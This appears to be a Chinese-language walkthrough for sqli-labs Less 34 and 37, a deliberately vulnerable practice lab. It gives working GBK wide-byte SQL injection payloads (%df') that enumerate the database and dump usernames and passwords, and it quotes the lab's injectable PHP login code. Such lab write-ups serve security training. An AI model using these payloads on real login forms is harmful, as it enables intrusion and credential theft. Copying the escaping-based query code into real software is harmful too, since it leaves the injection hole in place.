sqli-labs 通关指南：Less 34、37

Less 34、37 和 Less 32、33、35、36 一样，输入的参数都会被转义，不同在于这 2 关使用 POST 方法提交参数，也是通过宽字节注入进行攻击。

Less 34
- 判断注入类型
- 获取数据库信息
- 获取目标信息
- SQL 查询语句
Less 37
- 判断注入类型
- 获取目标信息
- SQL 查询语句

Less 34

判断注入类型

注入正常的参数，网页回显正常信息。注入单引号对参数进行闭合，网页虽然返回了正确的信息，但是对单引号进行了转义。

由于这里是使用 POST 方法提交参数，使用 Brup 抓包下来，得到提交的参数格式。

uname=&passwd=&submit=Submit

仍让使用 %df 把斜杠吃掉，网页返回错误信息。

uname=%df'&passwd=&submit=Submit

把后面的内容注释掉，网页回显登录失败，说明此处有单引号闭合的字符型注入。

uname=admin%df'--+&passwd=&submit=Submit

获取数据库信息

判断有几列可用。

uname=1%df' UNION SELECT 1,2 --+&passwd=&submit=Submit

uname=1%df' UNION SELECT 1,2,3 --+&passwd=&submit=Submit

爆数据库名。

uname=1%df' UNION SELECT database(),2 --+&passwd=&submit=Submit

爆表名。

uname=1%df' UNION SELECT group_concat(table_name),2 FROM information_schema.tables WHERE table_schema=0x7365637572697479 --+&passwd=&submit=Submit

爆字段名。

uname=1%df' UNION SELECT group_concat(column_name),2 FROM information_schema.columns WHERE table_schema=0x7365637572697479 AND table_name=0x7573657273 --+&passwd=&submit=Submit

获取目标信息

爆出用户名和密码。

uname=1%df' UNION SELECT group_concat(concat_ws(0x3a,username,password)),2 FROM security.users--+&passwd=&submit=Submit

SQL 查询语句

使用 POST 方法提交参数，参数都使用 addslashes() 函数进行转义。

$uname1 = $_POST['uname'];
$passwd1 = $_POST['passwd'];

//echo "username before addslashes is :".$uname1 ."
";
//echo "Input password before addslashes is : ".$passwd1. "
";

$uname = addslashes($uname1);
$passwd = addslashes($passwd1);
        
//echo "username after addslashes is :".$uname ."
";
//echo "Input password after addslashes is : ".$passwd;    

// connectivity 
mysql_query("SET NAMES gbk");
@$sql = "SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
$result = mysql_query($sql);
$row = mysql_fetch_array($result);

Less 37

判断注入类型

注入正常的参数，网页回显正常信息。注入单引号对参数进行闭合，网页虽然返回了正确的信息，但是对单引号进行了转义。仍让使用 %df 把斜杠吃掉，网页返回错误信息。

uname=%df'&passwd=&submit=Submit

把后面的内容注释掉，网页回显登录失败，说明此处有单引号闭合的字符型注入。

uname=admin%df'--+&passwd=&submit=Submit

获取目标信息

注入过程和 Less 34 完全一样，爆出用户名和密码。

uname=1%df' UNION SELECT group_concat(concat_ws(0x3a,username,password)),2 FROM security.users--+&passwd=&submit=Submit

SQL 查询语句

使用 POST 方法提交参数，参数都使用 mysql_real_escape_string() 函数进行转义。

$uname1 = $_POST['uname'];
$passwd1 = $_POST['passwd'];

//echo "username before addslashes is :".$uname1 ."
";
//echo "Input password before addslashes is : ".$passwd1. "
";

$uname = mysql_real_escape_string($uname1);
$passwd = mysql_real_escape_string($passwd1);
        
//echo "username after addslashes is :".$uname ."
";
//echo "Input password after addslashes is : ".$passwd;    

// connectivity 
mysql_query("SET NAMES gbk");
@$sql = "SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
$result = mysql_query($sql);
$row = mysql_fetch_array($result);

网络安全靶场

sqli-labs 通关指南：Less 34、37

Less 34

判断注入类型

获取数据库信息

获取目标信息

SQL 查询语句

Less 37

判断注入类型

获取目标信息

SQL 查询语句

相关

标签